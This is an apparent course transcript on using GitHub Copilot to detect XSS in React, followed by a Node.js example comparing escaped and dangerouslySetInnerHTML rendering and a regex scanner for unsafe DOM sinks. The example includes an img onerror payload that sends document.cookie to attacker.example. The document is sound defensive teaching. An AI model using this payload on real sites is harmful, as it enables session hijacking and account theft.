From the course: GitHub Copilot for Cybersecurity Specialists by Microsoft Press


Detect and prevent XSS vulnerabilities with GitHub Copilot assistance


We end Lesson 1 with cross-site scripting, which targets the browser rather than the server. Copilot can help trace untrusted input and guide you toward safe rendering. If the browser can't distinguish application logic from attacker-supplied data, malicious code runs with the user's privileges. For example, consider a React component that uses `dangerouslySetInnerHTML` to render user-generated HTML comments. Let's look at this real example here in React. This opt-out from React's escaping is the fastest way to resurrect 2005-era XSS risks in a modern app. Another example: a single broken image tag can exfiltrate session cookies to an attacker's server. That's how simple this exploit is. XSS compromises user identity, not just data. It's dangerous because server logs often look perfectly normal. Contoso News, for example, taught Copilot to scan templating files for unsafe DOM manipulation. Within one sprint, they reduced their XSS surface area dramatically.
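The two points above, the `dangerouslySetInnerHTML` opt-out and the broken image tag that ships cookies, plus the kind of sink scan Contoso News taught Copilot to run, as an added example that is not part of the course or of any Contoso code. It is plain Node.js, not a React app: `escapeHtml` stands in for what React does to `{comment}` in JSX, and the comment body, the component source and the attacker hostname are all constructed for illustration.

```javascript
// Added example (not from the course): React's default escaping versus the
// dangerouslySetInnerHTML opt-out, and a small scanner for unsafe DOM sinks.
// All sample data below is constructed; attacker.example is a made-up host.

// Attacker-supplied comment body: a broken <img> whose onerror handler sends
// document.cookie to an attacker-controlled host (the single-tag exploit).
const MALICIOUS_COMMENT =
  '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">';

// What React does for {comment} in JSX: escape the HTML metacharacters so the
// browser sees text, never markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[ch]);
}

// Safe rendering: equivalent of <p className="comment">{comment}</p>
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Unsafe rendering: equivalent of
//   <p className="comment" dangerouslySetInnerHTML={{ __html: comment }} />
// React inserts __html verbatim, so the attacker's tag becomes live DOM.
function renderCommentUnsafe(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Did attacker-controlled markup survive into the output unescaped?
// (A real check would parse the DOM; a literal "<img"/"<script" test is enough
// here because escaped output only ever contains "&lt;img".)
function hasInjectedTag(html) {
  return /<\s*(img|script|svg|iframe)\b/i.test(html);
}

// Source-level scan: the sinks that hand a string to the DOM without escaping.
// This is the kind of rule the transcript describes being taught to Copilot.
const UNSAFE_SINKS = [
  /dangerouslySetInnerHTML/,
  /\.innerHTML\s*=/,
  /\.outerHTML\s*=/,
  /insertAdjacentHTML\s*\(/,
  /document\.write\s*\(/,
  /\beval\s*\(/,
];

function scanForUnsafeSinks(source) {
  const findings = [];
  source.split("\n").forEach((line, i) => {
    for (const sink of UNSAFE_SINKS) {
      if (sink.test(line)) {
        findings.push({ line: i + 1, sink: sink.source, text: line.trim() });
      }
    }
  });
  return findings;
}

// Constructed React component in the shape the transcript describes: one
// prop rendered through the opt-out, one rendered normally.
const SAMPLE_COMPONENT = `
function Comment({ body }) {
  // user-generated HTML comments rendered without escaping
  return <div dangerouslySetInnerHTML={{ __html: body }} />;
}
function Title({ text }) {
  return <h2>{text}</h2>;   // escaped by React: safe
}
`;

// Stand-alone demonstration.
console.log("unsafe :", renderCommentUnsafe(MALICIOUS_COMMENT));
console.log("safe   :", renderCommentSafe(MALICIOUS_COMMENT));
console.log("injected tag survives unsafe render:",
  hasInjectedTag(renderCommentUnsafe(MALICIOUS_COMMENT)));
console.log("injected tag survives safe render  :",
  hasInjectedTag(renderCommentSafe(MALICIOUS_COMMENT)));
for (const f of scanForUnsafeSinks(SAMPLE_COMPONENT)) {
  console.log(`line ${f.line}: unsafe sink ${f.sink} -> ${f.text}`);
}
```

Note that the scanner is a first-pass filter, not proof of exploitability: a `dangerouslySetInnerHTML` whose input has already been run through a sanitizer is a finding to review, not a bug. What it cannot miss is the case in the transcript, attacker-controlled HTML reaching the sink with no sanitizer in between, and the `hasInjectedTag` check on the rendered output is the runtime counterpart of that same question.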
